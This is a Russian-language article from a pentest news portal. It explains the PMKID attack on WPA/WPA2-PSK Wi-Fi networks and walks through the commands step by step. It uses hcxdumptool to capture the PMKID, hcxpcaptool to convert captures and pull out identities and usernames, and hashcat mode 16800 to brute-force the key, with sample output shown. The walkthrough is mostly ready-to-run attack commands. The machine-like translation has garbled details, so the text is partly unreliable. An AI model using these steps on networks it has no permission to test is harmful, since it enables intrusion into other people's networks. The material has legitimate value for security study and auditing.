______________________________________________________________________________________________________________

HackFix.ru - информационный портал,рассказывающий о событиях в области защиты информации,
взломах,инструментах аудита,программировании для пентестеров!

Обнаружен новый метод для взлома пароля сети Wi-Fi WPA / WPA2 PSK.
!!!Важно!!!
Вся информация предоставлена исключительно в ознакомительных целях. Ни автор, ни администрация портала не несут ответственности за любой возможный вред, причиненный материалами данной статьи.Применение в корыстных целях карается законодательством РФ.

 

Обнаружен новый метод атаки для взлома WiFi сетей с поддержкой WPA/WPA2, который позволяет злоумышленникам получить хэш-код предварительного общего ключа, который использовался для взлома паролей, используемых целевыми жертвами.

Этот метод обнаружен во время атаки против недавно выпущенного стандарта безопасности WPA3, который чрезвычайно труднее взломать, так как его используемая Одновременная аутентификация Equals (SAE), современный протокол установления ключа.

Новый стандарт безопасности WP3, выпущенный Wi-Fi Alliance, который обеспечивает безопасность Wi-Fi следующего поколения с новыми возможностями для улучшения как личных, так и корпоративных сетей и новый стандарт безопасности WP3, который является преемником WPA2.

Исследователь находит эту атаку, чтобы скомпрометировать пароль WPA/WPA2 без выполнения eapol 4-way рукопожатия.

По словам Штейбена, который является разработчиком инструмента взлома паролей Hashcat, новая атака выполняется на RSN IE (надежный сетевой информационный элемент) одного кадра EAPOL.

Кроме того, эта атака работает против всех типов сетей 802.11 i/p/q/r с включенными функциями роуминга, и неясно, сколько поставщиков и сколько маршрутизаторов этот метод будет работать.

Как работает эта атака на WiFi

Попарный Идентификатор главного ключа (PMKID) может быть перехвачен от RSN IE каждый раз, когда пользователь пытается аутентифицироваться с маршрутизатором.

Здесь мы можем видеть, что PMKID был захвачен, вычислен при помощи HMAC-SHA1, где ключ является PMK, и часть данных является конкатенацией фиксированной метки строки “имя PMK”, MAC-адрес точки доступа и MAC-адрес станции.

Для того, чтобы использовать эту новую атаку, вам понадобятся следующие инструменты:

hcxdumptool v4.2.0 или выше
hcxtools v4.2.0 или выше
hashcat v4.2.0 или выше

Шаг 1
Первый запуск hcxdumptool получить PMKID из AP и дамп файл в формате pcap, используя следующий код.

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status

Выходные данные выглядят следующим образом:

start capturing (stop with ctrl+c)
INTERFACE:……………: wlp39s0f3u4u5
FILTERLIST……………: 0 entries
MAC CLIENT……………: 89acf0e761f4 (client)
MAC ACCESS POINT………: 4604ba734d4e (start NIC)
EAPOL TIMEOUT…………: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER…………: 62083
ANONCE……………….: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69

Шаг 2
Запустите следующий инструмент под названием hcxpcaptool, чтобы преобразовать захваченные данные из формата pcapng в хэш-Формат, принятый hashcat, используя следующий код.

$ ./hcxpcaptool -z test.16800 test.pcapng

Содержимое записанного файла будет выглядеть следующим образом, и он разделен на 4 колонки.

PMKID * MAC AP * MAC Station * ESSID

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a

Кроме того, исследователь рекомендует, что, хотя это и не требуется, рекомендуется использовать options-E-I и-U с hcxpcaptool. Мы можем использовать эти файлы, чтобы накормить оружие. Обычно они дают хорошие результаты.

— E получить возможные пароли от WiFi-трафика (дополнительно, этот список будет включать в себя ESSIDs)
— I извлекаю идентичности из WiFi-трафика
— U получить имена пользователей из WiFi-трафика

$ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

Шаг 3
Наконец, Запустите hashcat, чтобы взломать его, нам нужно использовать режим хэш PMKID -16800, и мы можем использовать этот хэш, как и любой другой тип хэша, используя следующий код,

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’

Взлом успешен, наш хэш WPA-PMKID-PBKDF2

Когда мы смотрим на ранее доступные атаки WiFi, нам нужно сидеть сложа руки и ждать, пока целевой пользователь не войдет в систему позже, мы можем взломать ключ, захватив четырехстороннее рукопожатие.

Для того, чтобы получить доступ к PMKID, эта новая атака просто попытка проверки подлинности в беспроводной сети позже мы можем легко взломать предварительный ключ.

Кроме того, этот метод гораздо проще получить доступ к хэшу, который содержит предварительный общий ключ, а затем момент хэш будет взломан, также эта атака немного сложна в зависимости от сложности пароля.

Добавить комментарий

Ваш e-mail не будет опубликован.

______________________________________________________________________________________________________________
^ Наверх